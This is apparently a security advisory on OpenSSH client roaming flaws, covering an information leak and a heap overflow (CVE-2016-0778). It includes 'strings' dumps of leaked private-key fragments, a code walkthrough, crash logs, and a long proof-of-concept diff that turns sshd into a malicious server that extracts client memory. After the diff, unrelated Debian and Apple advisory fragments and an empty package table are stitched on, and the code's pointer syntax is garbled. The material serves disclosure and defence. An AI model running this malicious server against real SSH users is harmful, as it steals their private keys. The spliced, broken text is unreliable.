yESI62wOuaY vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y 3fBC3h9BN5banCw6VKfnvm8/q+bwSxS

strings /tmp/roaming-9be933df/infoleak

QRtzK/GpRuMC1 C3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT

strings /tmp/roaming-ee4d1e6c/infoleak

SG3aTqYp tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s

strings /tmp/roaming-c2bfd69c/infoleak

SG3aTqYp 6JmTOun5zVV6A H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s

strings /tmp/roaming-2b3217a1/infoleak

DGLfFGdO r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ

strings /tmp/roaming-1e275747/infoleak

g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+

======================================================================== Buffer Overflow (CVE-2016-0778) ========================================================================

Analysis

Support for roaming was elegantly added to the OpenSSH client: the calls to read() and write() that communicate with the SSH server were replaced by calls to roaming_read() and roaming_write(), two wrappers that depend on wait_for_roaming_reconnect() to transparently reconnect to the server after a disconnection. The wait_for_roaming_reconnect() routine is essentially a sequence of four subroutines:

239 int 240 wait_for_roaming_reconnect(void) 241 { ... 250 fprintf(stderr, "[connection suspended, press return to resume]"); ... 252 packet_backup_state(); 253 / TODO Perhaps we should read from tty here / 254 while ((c = fgetc(stdin)) != EOF) { ... 259 if (c != '\n' && c != '\r') 260 continue; 261 262 if (ssh_connect(host, &hostaddr, options.port, ... 265 options.proxy_command) == 0 && roaming_resume() == 0) { 266 packet_restore_state(); ... 268 fprintf(stderr, "[connection resumed]\n"); ... 270 return 0; 271 } 272 273 fprintf(stderr, "[reconnect failed, press return to retry]"); ... 275 } 276 fprintf(stderr, "[exiting]\n"); ... 278 exit(0); 279 }

packet_backup_state() close()s connection_in and connection_out (the old file descriptors that connected the client to the server), and saves the state of the suspended SSH session (for example, the encryption and decryption contexts).
ssh_connect() opens new file descriptors, and connects them to the SSH server.
roaming_resume() negotiates the resumption of the suspended SSH session with the server, and calls resend_bytes().
packet_restore_state() updates connection_in and connection_out (with the new file descriptors that connect the client to the server), and restores the state of the suspended SSH session.

The new file descriptors for connection_in and connection_out may differ from the old ones (if, for example, files or pipes or sockets are opened or closed between two successive ssh_connect() calls), but unfortunately historical code in OpenSSH assumes that they are constant:

In client_loop(), the variables connection_in and connection_out are cached locally, but packet_write_poll() calls roaming_write(), which may assign new values to connection_in and connection_out (if a reconnection occurs), and client_wait_until_can_do_something() subsequently reuses the old, cached values.
client_loop() eventually updates these cached values, and the following FD_ISSET() uses a new, updated file descriptor (the fd connection_out), but an old, out-of-date file descriptor set (the fd_set writeset).
packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API) first calloc()ates setp, a file descriptor set for connection_in; next, it loops around memset(), FD_SET(), select() and roaming_read(); last, it free()s setp and returns. Unfortunately, roaming_read() may reassign a higher value to connection_in (if a reconnection occurs), but setp is never enlarged, and the following memset() and FD_SET() may therefore overflow setp (a heap-based buffer overflow):

1048 int 1049 packet_read_seqnr(u_int32_t seqnr_p) 1050 { .... 1052 fd_set setp; .... 1058 setp = (fd_set )xcalloc(howmany(active_state->connection_in + 1, 1059 NFDBITS), sizeof(fd_mask)); .... 1065 for (;;) { .... 1075 if (type != SSH_MSG_NONE) { 1076 free(setp); 1077 return type; 1078 } .... 1083 memset(setp, 0, howmany(active_state->connection_in + 1, 1084 NFDBITS) * sizeof(fd_mask)); 1085 FD_SET(active_state->connection_in, setp); .... 1092 for (;;) { .... 1097 if ((ret = select(active_state->connection_in + 1, setp, 1098 NULL, NULL, timeoutp)) >= 0) 1099 break; .... 1115 } .... 1117 do { .... 1119 len = roaming_read(active_state->connection_in, buf, 1120 sizeof(buf), &cont); 1121 } while (len == 0 && cont); .... 1130 } 1131 / NOTREACHED */ 1132 }

packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is basically similar to packet_read_seqnr() and may overflow its own setp if roaming_write() (called by packet_write_poll()) reassigns a higher value to connection_out (after a successful reconnection):

1739 void 1740 packet_write_wait(void) 1741 { 1742 fd_set setp; .... 1746 setp = (fd_set )xcalloc(howmany(active_state->connection_out + 1, 1747 NFDBITS), sizeof(fd_mask)); 1748 packet_write_poll(); 1749 while (packet_have_data_to_write()) { 1750 memset(setp, 0, howmany(active_state->connection_out + 1, 1751 NFDBITS) * sizeof(fd_mask)); 1752 FD_SET(active_state->connection_out, setp); .... 1758 for (;;) { .... 1763 if ((ret = select(active_state->connection_out + 1, 1764 NULL, setp, NULL, timeoutp)) >= 0) 1765 break; .... 1776 } .... 1782 packet_write_poll(); 1783 } 1784 free(setp); 1785 }

Mitigating Factors

This buffer overflow affects all OpenSSH clients >= 5.4, but its impact is significantly reduced by the Mitigating Factors detailed in the Information Leak section, and additionally:

OpenSSH versions >= 6.8 reimplement packet_backup_state() and packet_restore_state(), but introduce a bug that prevents the buffer overflow from being exploited; indeed, ssh_packet_backup_state() swaps two local pointers, ssh and backup_state, instead of swapping the two global pointers active_state and backup_state:

9 struct ssh active_state, backup_state; ... 238 void 239 packet_backup_state(void) 240 { 241 ssh_packet_backup_state(active_state, backup_state); 242 } 243 244 void 245 packet_restore_state(void) 246 { 247 ssh_packet_restore_state(active_state, backup_state); 248 }

2269 void 2270 ssh_packet_backup_state(struct ssh ssh, 2271 struct ssh backup_state) 2272 { 2273 struct ssh tmp; .... 2279 if (backup_state) 2280 tmp = backup_state; 2281 else 2282 tmp = ssh_alloc_session_state(); 2283 backup_state = ssh; 2284 ssh = tmp; 2285 } .... 2291 void 2292 ssh_packet_restore_state(struct ssh ssh, 2293 struct ssh backup_state) 2294 { 2295 struct ssh tmp; .... 2299 tmp = backup_state; 2300 backup_state = ssh; 2301 ssh = tmp; 2302 ssh->state->connection_in = backup_state->state->connection_in;

As a result, the global pointer backup_state is still NULL when passed to ssh_packet_restore_state(), and crashes the OpenSSH client when dereferenced:

env ROAMING="overflow:A fd_leaks:0" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key

$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1

$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 15 %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Segmentation fault (core dumped)

This bug prevents the buffer overflow from being exploited, but not the information leak, because the vulnerable function resend_bytes() is called before ssh_packet_restore_state() crashes.

File Descriptor Leak

A back-of-the-envelope calculation indicates that, in order to increase the file descriptor connection_in or connection_out, and thus overflow the file descriptor set setp in packet_read_seqnr() or packet_write_wait(), a file descriptor leak is needed:

First, the number of bytes calloc()ated for setp is rounded up to the nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors) on 64-bit systems.
Next, in glibc, this number is rounded up to the nearest multiple of MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit systems.
Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit systems, of which 24 bytes (or 192 file descriptors) are reserved for setp.
In conclusion, a file descriptor leak is needed, because connection_in or connection_out has to be increased by hundreds in order to overflow setp.

The search for a suitable file descriptor leak begins with a study of the behavior of the four ssh_connect() methods, when called for a reconnection by wait_for_roaming_reconnect():

The default method ssh_connect_direct() communicates with the server through a simple TCP socket: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.

In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old TCP socket is close()d by packet_backup_state(), but immediately reused for the new TCP socket in ssh_connect_direct(): the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.

The special ProxyCommand "-" communicates with the server through stdin and stdout, but (as explained in the Mitigating Factors of the Information Leak section) it cannot possibly reconnect to the server, and is therefore immune to this buffer overflow.
Surprisingly, we discovered a file descriptor leak in the ssh_proxy_fdpass_connect() method itself; indeed, the file descriptor sp[1] is never close()d:

101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 106 int sp[2], sock; ... 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) < 0) 114 fatal("Could not create socketpair to communicate with " 115 "proxy dialer: %.100s", strerror(errno)); ... 161 close(sp[0]); ... 164 if ((sock = mm_receive_fd(sp[1])) == -1) 165 fatal("proxy dialer did not pass back a connection"); ... 171 / Set the connection file descriptors. / 172 packet_set_connection(sock, sock); 173 174 return 0; 175 }

However, two different reasons prevent this file descriptor leak from triggering the setp overflow:

The method ssh_proxy_fdpass_connect() communicates with the server through a single socket received from the ProxyCommand: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.

In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old socket is close()d by packet_backup_state(), reused for sp[0] in ssh_proxy_fdpass_connect(), close()d again, and eventually reused again for the new socket: the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.

Because of the waitpid() bug described in the Mitigating Factors of the Information Leak section, the method ssh_proxy_fdpass_connect() calls fatal() before it returns to wait_for_roaming_reconnect(), and is therefore immune to this buffer overflow.
The method ssh_proxy_connect() communicates with the server through a ProxyCommand and two different pipes: the file descriptor connection_in is the read end of the second pipe (pout[0]), and the file descriptor connection_out is the write end of the first pipe (pin[1]):

180 static int 181 ssh_proxy_connect(const char host, u_short port, const char proxy_command) 182 { ... 184 int pin[2], pout[2]; ... 192 if (pipe(pin) < 0 || pipe(pout) < 0) 193 fatal("Could not create pipes to communicate with the proxy: %.100s", 194 strerror(errno)); ... 240 / Close child side of the descriptors. / 241 close(pin[0]); 242 close(pout[1]); ... 247 / Set the connection file descriptors. / 248 packet_set_connection(pout[0], pin[1]); 249 250 / Indicate OK return / 251 return 0; 252 }

In wait_for_roaming_reconnect(), the two old, low-numbered file descriptors connection_in and connection_out are both close()d by packet_backup_state(), and immediately reused for the pipe(pin) in ssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of these old, low-numbered file descriptors, and cannot possibly overflow setp.

On the other hand, the pipe(pout) in ssh_proxy_connect() may return high-numbered file descriptors, and the new connection_in (pout[0]) may therefore overflow setp, if hundreds of file descriptors were leaked before the call to wait_for_roaming_reconnect():

We discovered a file descriptor leak in the pubkey_prepare() function of OpenSSH >= 6.8; indeed, if the client is running an authentication agent that does not offer any private keys, the reference to agent_fd is lost, and this file descriptor is never close()d:

1194 static void 1195 pubkey_prepare(Authctxt *authctxt) 1196 { .... 1200 int agent_fd, i, r, found; .... 1247 if ((r = ssh_get_authentication_socket(&agent_fd)) != 0) { 1248 if (r != SSH_ERR_AGENT_NOT_PRESENT) 1249 debug("%s: ssh_get_authentication_socket: %s", 1250 func, ssh_err(r)); 1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, &idlist)) != 0) { 1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES) 1253 debug("%s: ssh_fetch_identitylist: %s", 1254 func, ssh_err(r)); 1255 } else { .... 1288 authctxt->agent_fd = agent_fd; 1289 } .... 1299 }

However, OpenSSH clients >= 6.8 crash in ssh_packet_restore_state() (because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section) and are immune to the setp overflow, despite this agent_fd leak.

If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH client (it is disabled by default), a malicious SSH server can request hundreds of forwardings, in order to increase connection_in (each forwarding opens a file descriptor), and thus overflow setp in packet_read_seqnr():

env ROAMING="overflow:A" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key

$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014

$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed] *** Error in `/usr/bin/ssh': free(): invalid next size (fast): 0x00007f0474d03e70 *** Aborted (core dumped)

env ROAMING="overflow:X" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key

$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013

$ /usr/bin/ssh -X -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed] *** Error in /usr/bin/ssh': free(): invalid next size (fast): 0x00007fdcc2a3aba0 *** *** Error in/usr/bin/ssh': malloc(): memory corruption: 0x00007fdcc2a3abc0 ***

Finally, a brief digression on two unexpected problems that had to be solved in our proof-of-concept:

First, setp can be overflowed only in packet_read_seqnr(), not in packet_write_wait(), but agent forwarding and X11 forwarding are post- authentication functionalities, and post-authentication calls to packet_read() or packet_read_expect() are scarce, except in the key-exchange code of OpenSSH clients < 6.8: our proof-of-concept effectively forces a rekeying in order to overflow setp in packet_read_seqnr().
Second, after a successful reconnection, packet_read_seqnr() may call fatal("Read from socket failed: %.100s", ...), because roaming_read() may return EAGAIN (EAGAIN is never returned without the reconnection, because the preceding call to select() guarantees that connection_in is ready for read()). Our proof-of-concept works around this problem by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server, allowing data to reach the client before roaming_read() is called, thus avoiding EAGAIN.

======================================================================== Acknowledgments ========================================================================

We would like to thank the OpenSSH developers for their great work and their incredibly quick response, Red Hat Product Security for promptly assigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall Project for the interesting discussions.

======================================================================== Proof Of Concept ========================================================================

diff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c --- openssh-6.4p1/auth2-pubkey.c 2013-07-17 23:10:10.000000000 -0700 +++ openssh-6.4p1+roaming/auth2-pubkey.c 2016-01-07 01:04:15.000000000 -0800 @@ -169,7 +169,9 @@ userauth_pubkey(Authctxt authctxt) * if a user is not allowed to login. is this an * issue? -markus / - if (PRIVSEP(user_key_allowed(authctxt->pw, key))) { + if (PRIVSEP(user_key_allowed(authctxt->pw, key)) || 1) { + debug("%s: force client-side load_identity_file", + func); packet_start(SSH2_MSG_USERAUTH_PK_OK); packet_put_string(pkalg, alen); packet_put_string(pkblob, blen); diff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c --- openssh-6.4p1/kex.c 2013-06-01 14:31:18.000000000 -0700 +++ openssh-6.4p1+roaming/kex.c 2016-01-07 01:04:15.000000000 -0800 @@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX], }

static void +roaming_reconnect(void) +{ + packet_read_expect(SSH2_MSG_KEX_ROAMING_RESUME); + const u_int id = packet_get_int(); / roaming_id / + debug("%s: id %u", func, id); + packet_check_eom(); + + const char const dir = get_roaming_dir(id); + debug("%s: dir %s", func, dir); + const int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK); + if (fd <= -1) + fatal("%s: open %s errno %d", func, dir, errno); + if (fchdir(fd) != 0) + fatal("%s: fchdir %s errno %d", func, dir, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, dir, errno); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED); + packet_put_int64(arc4random()); / chall / + packet_put_int64(arc4random()); / oldchall / + packet_send(); + + packet_read_expect(SSH2_MSG_KEX_ROAMING_AUTH); + const u_int64_t client_read_bytes = packet_get_int64(); + debug("%s: client_read_bytes %llu", func, + (unsigned long long)client_read_bytes); + packet_get_int64(); / digest (1-8) / + packet_get_int64(); / digest (9-16) / + packet_get_int(); / digest (17-20) / + packet_check_eom(); + + u_int64_t client_write_bytes; + size_t len = sizeof(client_write_bytes); + load_roaming_file("client_write_bytes", &client_write_bytes, &len); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + + u_int client_out_buf_size; + len = sizeof(client_out_buf_size); + load_roaming_file("client_out_buf_size", &client_out_buf_size, &len); + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0 || client_out_buf_size > MAX_ROAMBUF) + fatal("%s: client_out_buf_size %u", func, + client_out_buf_size); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_OK); + packet_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size); + packet_send(); + const int overflow = (access("output", F_OK) == 0); + if (overflow != 0) { + const void const ptr = load_roaming_file("output", NULL, &len); + buffer_append(packet_get_output(), ptr, len); + } + packet_write_wait(); + + char const client_out_buf = xmalloc(client_out_buf_size); + if (atomicio(read, packet_get_connection_in(), client_out_buf, + client_out_buf_size) != client_out_buf_size) + fatal("%s: read client_out_buf_size %u errno %d", func, + client_out_buf_size, errno); + if (overflow == 0) + dump_roaming_file("infoleak", client_out_buf, + client_out_buf_size); + fatal("%s: all done for %s", func, dir); +} + +static void kex_choose_conf(Kex kex) { Newkeys newkeys; @@ -470,6 +537,10 @@ kex_choose_conf(Kex kex) kex->roaming = 1; free(roaming); } + } else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) { + roaming_reconnect(); + / NOTREACHED / + fatal("%s: returned from %s", func, KEX_RESUME); }

/* Algorithm Negotiation */

diff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h --- openssh-6.4p1/roaming.h 2011-12-18 15:52:52.000000000 -0800 +++ openssh-6.4p1+roaming/roaming.h 2016-01-07 01:04:15.000000000 -0800 @@ -42,4 +42,86 @@ void resend_bytes(int, u_int64_t ); void calculate_new_key(u_int64_t , u_int64_t, u_int64_t); int resume_kex(void);

+#include +#include +#include +#include +#include +#include + +#include "atomicio.h" +#include "log.h" +#include "xmalloc.h" + +static inline char * +get_roaming_dir(const u_int id) +{ + const size_t buflen = MAXPATHLEN; + char const buf = xmalloc(buflen); + + if ((u_int)snprintf(buf, buflen, "/tmp/roaming-%08x", id) >= buflen) + fatal("%s: snprintf %u error", func, id); + return buf; +} + +static inline void +dump_roaming_file(const char const name, + const void const buf, const size_t buflen) +{ + if (name == NULL) + fatal("%s: name %p", func, name); + if (strchr(name, '/') != NULL) + fatal("%s: name %s", func, name); + if (buf == NULL) + fatal("%s: %s buf %p", func, name, buf); + if (buflen <= 0 || buflen > MAX_ROAMBUF) + fatal("%s: %s buflen %lu", func, name, (u_long)buflen); + + const int fd = open(name, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR); + if (fd <= -1) + fatal("%s: open %s errno %d", func, name, errno); + if (write(fd, buf, buflen) != (ssize_t)buflen) + fatal("%s: write %s errno %d", func, name, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, name, errno); +} + +static inline void * +load_roaming_file(const char const name, + void buf, size_t const buflenp) +{ + if (name == NULL) + fatal("%s: name %p", func, name); + if (strchr(name, '/') != NULL) + fatal("%s: name %s", func, name); + if (buflenp == NULL) + fatal("%s: %s buflenp %p", func, name, buflenp); + + const int fd = open(name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK); + if (fd <= -1) + fatal("%s: open %s errno %d", func, name, errno); + struct stat st; + if (fstat(fd, &st) != 0) + fatal("%s: fstat %s errno %d", func, name, errno); + if (S_ISREG(st.st_mode) == 0) + fatal("%s: %s mode 0%o", func, name, (u_int)st.st_mode); + if (st.st_size <= 0 || st.st_size > MAX_ROAMBUF) + fatal("%s: %s size %lld", func, name, + (long long)st.st_size); + + if (buf == NULL) { + buflenp = st.st_size; + buf = xmalloc(buflenp); + } else { + if (buflenp != (size_t)st.st_size) + fatal("%s: %s size %lld buflen %lu", func, name, + (long long)st.st_size, (u_long)buflenp); + } + if (read(fd, buf, buflenp) != (ssize_t)buflenp) + fatal("%s: read %s errno %d", func, name, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, name, errno); + return buf; +} + #endif / ROAMING / diff -pruN openssh-6.4p1/serverloop.c openssh-6.4p1+roaming/serverloop.c --- openssh-6.4p1/serverloop.c 2013-07-17 23:12:45.000000000 -0700 +++ openssh-6.4p1+roaming/serverloop.c 2016-01-07 01:04:15.000000000 -0800 @@ -1060,6 +1060,9 @@ server_request_session(void) return c; }

+static int client_session_channel = -1; +static int server_session_channel = -1; + static void server_input_channel_open(int type, u_int32_t seq, void ctxt) { @@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in c->remote_window = rwindow; c->remote_maxpacket = rmaxpack; if (c->type != SSH_CHANNEL_CONNECTING) { + debug("%s: avoid client-side buf_append", func); + / packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); packet_put_int(c->remote_id); packet_put_int(c->self); packet_put_int(c->local_window); packet_put_int(c->local_maxpacket); packet_send(); + */ + if (strcmp(ctype, "session") == 0) { + if (client_session_channel != -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + client_session_channel = c->remote_id; + server_session_channel = c->self; + } } } else { debug("server_input_channel_open: failure %s", ctype); @@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in }

static void +roaming_disconnect(Kex const kex) +{ + const char cp, roaming = getenv("ROAMING"); + if (roaming == NULL) + roaming = "infoleak"; + int overflow = 0; + if ((cp = strstr(roaming, "overflow:")) != NULL) + overflow = cp[9]; + + const u_int client_recv_buf_size = packet_get_int(); + packet_check_eom(); + const u_int server_recv_buf_size = get_recv_buf_size(); + const u_int server_send_buf_size = get_snd_buf_size(); + debug("%s: client_recv_buf_size %u", func, client_recv_buf_size); + debug("%s: server_recv_buf_size %u", func, server_recv_buf_size); + debug("%s: server_send_buf_size %u", func, server_send_buf_size); + + u_int client_send_buf_size = 0; + if ((cp = strstr(roaming, "client_send_buf_size:")) != NULL) + client_send_buf_size = strtoul(cp + 21, NULL, 0); + else if (client_recv_buf_size == DEFAULT_ROAMBUF) + client_send_buf_size = DEFAULT_ROAMBUF; + else { + const u_int + max = MAX(client_recv_buf_size, server_recv_buf_size), + min = MIN(client_recv_buf_size, server_recv_buf_size); + if (min <= 0) + fatal("%s: min %u", func, min); + if (((u_int64_t)(max - min) * 1024) / min < 1) + client_send_buf_size = server_send_buf_size; + else + client_send_buf_size = client_recv_buf_size; + } + debug("%s: client_send_buf_size %u", func, client_send_buf_size); + if (client_send_buf_size <= 0) + fatal("%s: client_send_buf_size", func); + + u_int id = 0; + char dir = NULL; + for (;;) { + id = arc4random(); + debug("%s: id %u", func, id); + free(dir); + dir = get_roaming_dir(id); + if (mkdir(dir, S_IRWXU) == 0) + break; + if (errno != EEXIST) + fatal("%s: mkdir %s errno %d", func, dir, errno); + } + debug("%s: dir %s", func, dir); + if (chdir(dir) != 0) + fatal("%s: chdir %s errno %d", func, dir, errno); + + u_int client_out_buf_size = 0; + if ((cp = strstr(roaming, "client_out_buf_size:")) != NULL) + client_out_buf_size = strtoul(cp + 20, NULL, 0); + else if (overflow != 0) + client_out_buf_size = MAX_ROAMBUF; + else + client_out_buf_size = 1 + arc4random() % 4096; + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0) + fatal("%s: client_out_buf_size", func); + dump_roaming_file("client_out_buf_size", &client_out_buf_size, + sizeof(client_out_buf_size)); + + if ((cp = strstr(roaming, "scp_mode")) != NULL) { + if (overflow != 0) + fatal("%s: scp_mode is incompatible with overflow %d", + func, overflow); + + u_int seconds_left_to_sleep = 3; + if ((cp = strstr(cp, "sleep:")) != NULL) + seconds_left_to_sleep = strtoul(cp + 6, NULL, 0); + debug("%s: sleep %u", func, seconds_left_to_sleep); + + if (client_session_channel == -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + + packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_put_int(client_session_channel); + packet_put_int(server_session_channel); + packet_put_int(0); / server window / + packet_put_int(0); / server maxpacket / + packet_send(); + + packet_start(SSH2_MSG_CHANNEL_DATA); + packet_put_int(client_session_channel); + packet_put_string("\0\n", 2); / response&source|sink&run_err / + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_REQUEST); + packet_get_int(); / server channel / + debug("%s: channel request %s", func, + packet_get_cstring(NULL)); + + while (seconds_left_to_sleep) + seconds_left_to_sleep = sleep(seconds_left_to_sleep); + } + + packet_start(SSH2_MSG_REQUEST_SUCCESS); + packet_put_int(id); / roaming_id / + packet_put_int64(arc4random()); / cookie / + packet_put_int64(0); / key1 / + packet_put_int64(0); / key2 / + packet_put_int(client_out_buf_size - client_send_buf_size); + packet_send(); + packet_write_wait(); + + if (overflow != 0) { + const u_int64_t full_client_out_buf = get_recv_bytes() + + client_out_buf_size; + + u_int fd_leaks = 4 * 8 * 8; / MIN_CHUNK_SIZE in bits / + if ((cp = strstr(roaming, "fd_leaks:")) != NULL) + fd_leaks = strtoul(cp + 9, NULL, 0); + debug("%s: fd_leaks %u", func, fd_leaks); + + while (fd_leaks--) { + packet_start(SSH2_MSG_CHANNEL_OPEN); + packet_put_cstring(overflow == 'X' ? "x11" : + "auth-agent@openssh.com"); / ctype / + packet_put_int(arc4random()); / server channel / + packet_put_int(arc4random()); / server window / + packet_put_int(arc4random()); / server maxpacket / + if (overflow == 'X') { + packet_put_cstring(""); / originator / + packet_put_int(arc4random()); / port / + } + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_get_int(); / server channel / + packet_get_int(); / client channel / + packet_get_int(); / client window / + packet_get_int(); / client maxpacket / + packet_check_eom(); + } + + while (get_recv_bytes() <= full_client_out_buf) { + packet_start(SSH2_MSG_GLOBAL_REQUEST); + packet_put_cstring(""); / rtype / + packet_put_char(1); / want_reply / + packet_send(); + + packet_read_expect(SSH2_MSG_REQUEST_FAILURE); + packet_check_eom(); + } + + if (kex == NULL) + fatal("%s: no kex, cannot rekey", func); + if (kex->flags & KEX_INIT_SENT) + fatal("%s: KEX_INIT_SENT already", func); + char const ptr = buffer_ptr(&kex->my); + const u_int len = buffer_len(&kex->my); + if (len <= 1+4) / first_kex_follows + reserved / + fatal("%s: kex len %u", func, len); + ptr[len - (1+4)] = 1; / first_kex_follows / + kex_send_kexinit(kex); + + u_int i; + packet_read_expect(SSH2_MSG_KEXINIT); + for (i = 0; i < KEX_COOKIE_LEN; i++) + packet_get_char(); + for (i = 0; i < PROPOSAL_MAX; i++) + free(packet_get_string(NULL)); + packet_get_char(); / first_kex_follows / + packet_get_int(); / reserved / + packet_check_eom(); + + char buf[81922]; / two packet_read_seqnr bufferfuls / + memset(buf, '\0', sizeof(buf)); + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL); + packet_put_string(buf, sizeof(buf)); + packet_send(); + const Buffer const output = packet_get_output(); + dump_roaming_file("output", buffer_ptr(output), + buffer_len(output)); + } + + const u_int64_t client_write_bytes = get_recv_bytes(); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + dump_roaming_file("client_write_bytes", &client_write_bytes, + sizeof(client_write_bytes)); + fatal("%s: all done for %s", func, dir); +} + +static void server_input_global_request(int type, u_int32_t seq, void ctxt) { char rtype; @@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_ } else if (strcmp(rtype, "no-more-sessions@openssh.com") == 0) { no_more_sessions = 1; success = 1; + } else if (strcmp(rtype, ROAMING_REQUEST) == 0) { + if (want_reply != 1) + fatal("%s: rtype %s want_reply %d", func, + rtype, want_reply); + roaming_disconnect(ctxt); + / NOTREACHED */ + fatal("%s: returned from %s", func, ROAMING_REQUEST); } if (want_reply) { packet_start(success ? diff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c --- openssh-6.4p1/sshd.c 2013-07-19 20:21:53.000000000 -0700 +++ openssh-6.4p1+roaming/sshd.c 2016-01-07 01:04:15.000000000 -0800 @@ -2432,6 +2432,8 @@ do_ssh2_kex(void) } if (options.kex_algorithms != NULL) myproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms; + else + myproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX "," KEX_RESUME;

if (options.rekey_limit || options.rekey_interval)
    packet_set_rekey_limits((u_int32_t)options.rekey_limit,

More details about identifying an attack and mitigations will be available in the Qualys Security Advisory.

For the oldstable distribution (wheezy), these problems have been fixed in version 1:6.0p1-4+deb7u3.

For the stable distribution (jessie), these problems have been fixed in version 1:6.7p1-5+deb8u1.

For the testing distribution (stretch) and unstable distribution (sid), these problems will be fixed in a later version. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002

OS X El Capitan 10.11.4 and Security Update 2016-002 is now available and addresses the following:

OS X El Capitan 10.11.4 includes the security content of Safari 9.1. https://support.apple.com/kb/HT206171

OS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/

Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

